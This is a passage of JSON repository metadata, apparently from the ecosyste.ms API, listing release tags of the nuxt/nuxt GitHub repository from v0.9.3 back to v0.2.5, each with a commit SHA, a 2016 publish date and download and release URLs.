epos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/